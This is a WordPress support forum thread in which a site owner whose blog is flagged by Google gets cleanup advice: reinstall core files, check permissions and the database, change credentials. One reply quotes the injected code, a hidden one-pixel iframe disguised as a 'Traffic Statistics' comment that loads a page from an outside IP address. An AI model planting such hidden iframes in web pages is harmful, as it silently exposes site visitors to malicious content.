Upgrading alone is not really a fix right?
It is the proper fix if done in time.
In your situation first clean up the site and then upgrade. Without cleaning the malicious code, the upgrade won’t help in itself.
Is there any efficient and thorough way to scrub my site without manually looking at a bunch of files in a text editor?
Not really. You either delete all your WP files from the server and install a clean package, or you go through the files.
Two notes:
1. If your site has been hacked by injecting stuff into the database… that’s even worse than just cleaning the files.
2. Many times, if files were corrupted or installed on your site, they might be in the wp-content folder (e.g. under upload in strange folders) – and all the upgrade instructions say “do not delete the wp-content folder”; so even after a carefully executed upgrade the bad things might sit there.
I went through all the theme files and couldn’t see anything suspicious. I really have no idea what’s going on. Everything seems fine except that google has me flagged. I don’t understand how serving up text content can be so complicated and dangerous.
So the bottom line is that I’m screwed and there’s no way to solve this?
How is it that hackers are able to modify my files anyway?
its terribly annoying to have to go through someone’s post history to get a url. :(( Your site is here:
http://www.unallied.com/
and its compromised.
<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --><!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --><!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
How is it that hackers are able to modify my files anyway?
Since google wont cache it in its present state, I cant really tell for sure, but chances are that its been like this for quite some time.
Is there any efficient and thorough way to scrub my site without manually looking at a bunch of files in a text editor?
Yes, and no. You arent using any plugins, really, so i would go through the theme files with an editor, yes.
You doublecheck ALL the permissions on your files and the dirs. YOu look for any stray files that you didnt upload. You check your db for any odd entries or rogue users. Then you shitcan ALL of the core WP files (delete them ALL except for the wp-config.php) and you upload fresh ones. And, I would assume the worst, your mysql passwd inside the wp-config.php has been compromised — so I would change it.
Thats where I would start if it were MY site.
PS: If you are unwilling to do all of that, or unable, I do “clean up” compromised sites. I charge, but Im very reasonable. Ive a contact form on my own site for those sorts of requests.
actually, yahoo does caching now —
http://cache.search.yahoo.net/search/cache?ei=UTF-8&p=http%3A%2F%2Fwww.unallied.com&fr=yfp-t-501&u=www.unallied.com/&d=RIQcvhg5RMs7&icp=1&.intl=us
thats your site back at 2.3.3 and notice in the source, it’s compromised, so it’s been there at least since before you upgraded.
Thanks for the help. I looked at every file in my template (the ones editable from within the admin panel) and didn’t see any iframe stuff or stuff that looked suspicious. I guess I could have missed it.
A few hours ago I wiped everything and uploaded a fresh version except wp-config and the theme I’m using. So, the theme could be suspect, and the database.
I’m surprised that there isn’t some kind of anti-virus PHP code that could scan a WP install for this stuff. I’m not saying it’s trivial by any means, but it seems not that hard by someone who knows what they are doing.
theres a plugin, but the fact is, thats not a solution, its just another tool, and frankly, I dont trust plugins to do a job I Know I can do better.
Reliance on plugins isnt the solution — they become crutches, and largely ARE crutches in this community. You were running a old version of WP prior to upgrading to the 2.3.x branch; I found a cached page of your site that indicated you were at 2.04 or something. The ultimate solution is stay on top of upgrades. Thats the singular best thing people can do.
A few hours ago I wiped everything …
And the malicious content is still there.
How can you tell it’s still there, and since you can, can you tell where or what?
How can you tell …
Because I can see it in your source.
Every browser comes with the ability to view source.
as for the rest of the question:
http://wordpress.org/search/wp-stats.php?forums=1
this isnt new.
I found a bunch of crap in the body of the post. Hopefully that’s it.
